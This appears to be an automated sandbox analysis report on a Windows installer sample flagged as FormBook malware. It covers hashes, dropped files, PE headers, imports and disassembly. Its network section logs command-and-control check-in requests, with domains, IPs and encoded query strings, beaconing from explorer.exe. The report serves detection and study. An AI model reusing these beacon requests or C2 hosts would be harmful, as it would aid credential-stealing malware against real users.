                                      Preview: .....=.3m.y..".RO7]..^.i..0...l.M..?.......f.UkZod..Zg@3......U...u...E<./..+.@6.../...XP.f...^GO...aA#jO.~.="g(.f....Tk......Q.^[L.9...}.......E..]9...?ro.0fFi..o..?. ..R...m....Vr..?.1..htVEJ...-..q....'i..D.d.(...K.A..z;...."..jX..y.qw.P"<....I..*\.)..6........'.....@...m...9..]V......)M.D38..1.w.h^..T.K.P.....UM.,Z..Ds.y.....I..s.h`;S...I....Y.mK7...4..2.}]./..>c!.~D........4.V...J...L..2.j.....o..h..R`..#.J.....n!....G.L.z..r.Y.......<s.M.[.....<X..=.+....D2....z...}.......3......(.>H..%O..;x....p...H...{.E..F.1.L..?Ld..Q....g{.+.h%.^4@...V.3._..pa@s...u...-.h...i,.#-...u...v..e-..3...Vk.=f8$,.K.a...O..fShD.J.T..{9.....88a.......O../X..D5*....W7.F..&W...w..........v.T.}I&.XT]..... .T.g[.}>)%Q....V..N....Z.Y..)~W.Z....>....g..]dA...'...T\.e..*..Y.-S.s._.y3..:....r......@.v]9.p'...&..@...x..D>u#.>.%.jO..\...<..4..K..@..Q.W......9..[cO.j/...Y.dX.B.r..A.nk.c.>.&..,_....H]...P+s7....^n..Eg.*o.(...X.;.b{H$>...7.f..R.....pK.:R{.......T^<.tJ
                                      C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):4.1271255992731
                                      Encrypted:false
                                      SSDEEP:48:vpghendHRWgTJzDrscX/oh/jTLNuLebdsbriB4ZYmRz:BYIWcxtXghrnktfiuZVR
                                      MD5:823D8D2962EF7A632F256759B088FFF8
                                      SHA1:263245E0C8D9EF7FACDE174BE1CEE3FAA9A846BA
                                      SHA-256:7DDF5362A2603771F85D4CE7341B647FE839005820F52C47B3391D38F839E89F
                                      SHA-512:6563CA17DE1820B7DED3D39B106D0C0FB4C8BBC3EF2A5B88DDBD30FA8C2A4CBDB521D5C6960281B930BAA126F2FE637CB605ECA2EC4C3709AD16AC63E2B3D3D2
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 6%
                                      Reputation:low
                                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...L.n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L...$ ..............................................("...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\sn7trv7b4c9aukp2
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6661
                                      Entropy (8bit):7.966207593101436
                                      Encrypted:false
                                      SSDEEP:192:qdeemJBzAS2B25DiXlBUrBKli0qLnnZAvAVnHd:SepQB2FSbUF6snZbVHd
                                      MD5:9C2EE18B684CD1990D6BB0140F48B8EF
                                      SHA1:D2AC6BFA52B3DB413E8FFEB941DA0A8CC6ABE263
                                      SHA-256:1723655FB6D497AC55E316181F4243F8CF2D49578C714F8997DAC9966D71659E
                                      SHA-512:BC5DAF45130DB66C1E5A86880F3F3B49E9313F14B10C165FBC87A5702014B668AE7559D4B1958F7CF41941B6B6DF674E15C78379B607CC600C4B007CC4368C14
                                      Malicious:false
                                      Reputation:low
                                      Preview: ...I|..Q...p.P....W.....b..vc........j. .T?..Rg.k..+.gWC.c.[.3..s.`.X.0.n.oeM].5.{.|2Yj..BSx../-g..?Y}.~<d4..LW...A.9...]...>.6...kT.MK.C....Y.ZH...#..V.W.... ..c.d.8..-..`.i......e...%.t.4..M.*.y..1....'y...6..|.t~...C...q....@.#j...&L.M.p{..sU.~.~P......zV....W.....y_.P.T^..PP.N..h.vR[m.3.[.U.adY.Q<.^.d...._9.k.c.;Uy.zhf`..8cv.w-:e..=i...:.2..Jg...7./..G-...D8<...;R.SIKA...AO.PFL>....\.U./K....a.b....+..^._....(..k.l...#.r..2.MT..p.../-...\.g.;<......78....BC..A....?..=.AJ...M..)A.2w.:.M.,....qQ...F..U..,....Y]...U..+....,'..l.... U.N..+.!,.'4.lr.s./....h(.,.p..\ .=..0p.,.x..D0...0.[..~..|,S..G..8..V....,[.R....T..4.v.S...[."...G(N. .K..sM.g.^.+3.`..]e(m..q..w..3.oo=5...*d.y,2...8y...6....9.....#....*>H........)mU...(zO.....[....r]...G..w..0..YH.....6.T_..Y.J....)...fVD...>3..(r.u..u./%q.nW.pp.....Ur.xw..c.....J.eL.~...6.7.7...Q.......:....T...O.P...U....U.".UW.dabb...bd.G.._...i....gf..4.....~4..qP..1...n<.=...B..B.B.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.919280210748743
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Y4U48592345670954.exe
                                      File size:227550
                                      MD5:e8e69391d3a931e6638adaebf6a339f6
                                      SHA1:29c02e786c6f8b343bc0f05a1195ff5215d21e63
                                      SHA256:20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
                                      SHA512:da123a74a0e598d6d1e1886d18a1141da3ea6403e03984e01a2ffc76723ccc3837cf8dc652bbeae2e435278e321a9b31ed434a79215a6b67fe7c81524b1fde5e
                                      SSDEEP:6144:HdliJDX8Ai9mv9eMy6VP+xNYkm0spiNGU:jiB8AiEVeJF
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                      File Icon

                                      Icon Hash:b2a88c96b2ca6a72

                                      Static PE Info

                                      General

                                      Entrypoint:0x40314a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 0000017Ch
                                      push ebx
                                      push ebp
                                      push esi
                                      xor esi, esi
                                      push edi
                                      mov dword ptr [esp+18h], esi
                                      mov ebp, 00409240h
                                      mov byte ptr [esp+10h], 00000020h
                                      call dword ptr [00407030h]
                                      push esi
                                      call dword ptr [00407270h]
                                      mov dword ptr [007A3030h], eax
                                      push esi
                                      lea eax, dword ptr [esp+30h]
                                      push 00000160h
                                      push eax
                                      push esi
                                      push 0079E540h
                                      call dword ptr [00407158h]
                                      push 00409230h
                                      push 007A2780h
                                      call 00007FA960977D68h
                                      mov ebx, 007AA400h
                                      push ebx
                                      push 00000400h
                                      call dword ptr [004070B4h]
                                      call 00007FA9609754A9h
                                      test eax, eax
                                      jne 00007FA960975566h
                                      push 000003FBh
                                      push ebx
                                      call dword ptr [004070B0h]
                                      push 00409228h
                                      push ebx
                                      call 00007FA960977D53h
                                      call 00007FA960975489h
                                      test eax, eax
                                      je 00007FA960975682h
                                      mov edi, 007A9000h
                                      push edi
                                      call dword ptr [00407140h]
                                      call dword ptr [004070ACh]
                                      push eax
                                      push edi
                                      call 00007FA960977D11h
                                      push 00000000h
                                      call dword ptr [00407108h]
                                      cmp byte ptr [007A9000h], 00000022h
                                      mov dword ptr [007A2F80h], eax
                                      mov eax, edi
                                      jne 00007FA96097554Ch
                                      mov byte ptr [esp+10h], 00000022h
                                      mov eax, 00000001h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x900.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc0x3ac0000x9000xa00False0.409375data3.94574916515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x3ac1900x2e8dataEnglishUnited States
                                      RT_DIALOG0x3ac4780x100dataEnglishUnited States
                                      RT_DIALOG0x3ac5780x11cdataEnglishUnited States
                                      RT_DIALOG0x3ac6980x60dataEnglishUnited States
                                      RT_GROUP_ICON0x3ac6f80x14dataEnglishUnited States
                                      RT_MANIFEST0x3ac7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                      Imports

                                      DLLImport
                                      KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                      USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                      SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      04/08/21-12:28:02.299363TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.4
                                      04/08/21-12:28:25.088543TCP1201ATTACK-RESPONSES 403 Forbidden804976934.102.136.180192.168.2.4
                                      04/08/21-12:28:43.295202TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.434.102.136.180
                                      04/08/21-12:28:43.295202TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.434.102.136.180
                                      04/08/21-12:28:43.295202TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977080192.168.2.434.102.136.180
                                      04/08/21-12:28:43.409063TCP1201ATTACK-RESPONSES 403 Forbidden804977034.102.136.180192.168.2.4

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 8, 2021 12:27:41.465953112 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.620493889 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.620574951 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.620716095 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.775491953 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.775533915 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.775551081 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:27:41.775660992 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.775732994 CEST4976080192.168.2.469.163.220.52
                                      Apr 8, 2021 12:27:41.931611061 CEST804976069.163.220.52192.168.2.4
                                      Apr 8, 2021 12:28:02.170397043 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.183226109 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.183315039 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.183496952 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.196137905 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.299362898 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.299391031 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:02.299635887 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.299704075 CEST4976680192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:02.312124014 CEST804976634.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:24.894125938 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:24.908015013 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:24.908196926 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:24.908379078 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:24.925878048 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:25.088542938 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:25.088572025 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:25.088747025 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:25.089088917 CEST4976980192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:25.101531029 CEST804976934.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.282567024 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.294913054 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.295043945 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.295202017 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.307471991 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.409063101 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.409204960 CEST804977034.102.136.180192.168.2.4
                                      Apr 8, 2021 12:28:43.409269094 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.409306049 CEST4977080192.168.2.434.102.136.180
                                      Apr 8, 2021 12:28:43.423803091 CEST804977034.102.136.180192.168.2.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 8, 2021 12:26:35.185254097 CEST5802853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:35.217926979 CEST53580288.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:35.575154066 CEST5309753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:35.588382959 CEST53530978.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:36.324259996 CEST4925753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:36.337037086 CEST53492578.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:43.994112015 CEST6238953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:44.006736994 CEST53623898.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:44.795666933 CEST4991053192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:44.808929920 CEST53499108.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:45.788333893 CEST5585453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:45.800919056 CEST53558548.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:46.666851044 CEST6454953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:46.679826975 CEST53645498.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:48.438355923 CEST6315353192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:48.451751947 CEST53631538.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:49.404546976 CEST5299153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:49.417890072 CEST53529918.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:50.460009098 CEST5370053192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:50.472664118 CEST53537008.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:51.404746056 CEST5172653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:51.420192957 CEST53517268.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:52.277659893 CEST5679453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:52.290190935 CEST53567948.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:53.223326921 CEST5653453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:53.236185074 CEST53565348.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:54.315073967 CEST5662753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:54.329687119 CEST53566278.8.8.8192.168.2.4
                                      Apr 8, 2021 12:26:55.079834938 CEST5662153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:26:55.092345953 CEST53566218.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:06.022429943 CEST6311653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:06.035130978 CEST53631168.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:25.859730005 CEST6407853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:25.873265982 CEST53640788.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:27.783050060 CEST6480153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:27.854206085 CEST53648018.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:28.419117928 CEST6172153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:28.474838018 CEST53617218.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:28.519038916 CEST5125553192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:28.532649040 CEST53512558.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:28.973104954 CEST6152253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:28.986398935 CEST53615228.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:29.363286972 CEST5233753192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:29.376493931 CEST53523378.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:29.548408985 CEST5504653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:29.574208975 CEST53550468.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:29.814661980 CEST4961253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:29.827439070 CEST53496128.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:30.255325079 CEST4928553192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:30.268846035 CEST53492858.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:30.637536049 CEST5060153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:30.702814102 CEST53506018.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:31.303796053 CEST6087553192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:31.316726923 CEST53608758.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:31.858030081 CEST5644853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:31.870361090 CEST53564488.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:31.957674026 CEST5917253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:32.040802002 CEST53591728.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:32.336369038 CEST6242053192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:32.349597931 CEST53624208.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:32.819674969 CEST6057953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:32.832504988 CEST53605798.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:33.856560946 CEST5018353192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:33.869515896 CEST53501838.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:41.262495995 CEST6153153192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:41.459153891 CEST53615318.8.8.8192.168.2.4
                                      Apr 8, 2021 12:27:45.038957119 CEST4922853192.168.2.48.8.8.8
                                      Apr 8, 2021 12:27:45.052339077 CEST53492288.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:02.128470898 CEST5979453192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:02.168994904 CEST53597948.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:15.093986988 CEST5591653192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:15.106564999 CEST53559168.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:16.849348068 CEST5275253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:16.881546021 CEST53527528.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:24.871767044 CEST6054253192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:24.892980099 CEST53605428.8.8.8192.168.2.4
                                      Apr 8, 2021 12:28:43.241204977 CEST6068953192.168.2.48.8.8.8
                                      Apr 8, 2021 12:28:43.281166077 CEST53606898.8.8.8192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Apr 8, 2021 12:27:41.262495995 CEST192.168.2.48.8.8.80x88a3Standard query (0)www.contecoliving.comA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:02.128470898 CEST192.168.2.48.8.8.80xa1d3Standard query (0)www.identityofplace.comA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:24.871767044 CEST192.168.2.48.8.8.80x36Standard query (0)www.constipationhub.comA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:43.241204977 CEST192.168.2.48.8.8.80xc57dStandard query (0)www.tententacleshydro.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Apr 8, 2021 12:27:41.459153891 CEST8.8.8.8192.168.2.40x88a3No error (0)www.contecoliving.com69.163.220.52A (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST8.8.8.8192.168.2.40xa1d3No error (0)www.identityofplace.comidentityofplace.comCNAME (Canonical name)IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST8.8.8.8192.168.2.40xa1d3No error (0)identityofplace.com34.102.136.180A (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST8.8.8.8192.168.2.40x36No error (0)www.constipationhub.comconstipationhub.comCNAME (Canonical name)IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST8.8.8.8192.168.2.40x36No error (0)constipationhub.com34.102.136.180A (IP address)IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST8.8.8.8192.168.2.40xc57dNo error (0)www.tententacleshydro.comtententacleshydro.comCNAME (Canonical name)IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST8.8.8.8192.168.2.40xc57dNo error (0)tententacleshydro.com34.102.136.180A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.contecoliving.com
                                      • www.identityofplace.com
                                      • www.constipationhub.com
                                      • www.tententacleshydro.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.44976069.163.220.5280C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:27:41.620716095 CEST2074OUTGET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1
                                      Host: www.contecoliving.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:27:41.775533915 CEST2075INHTTP/1.1 301 Moved Permanently
                                      Date: Thu, 08 Apr 2021 10:27:41 GMT
                                      Server: Apache
                                      Location: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D
                                      Content-Length: 346
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
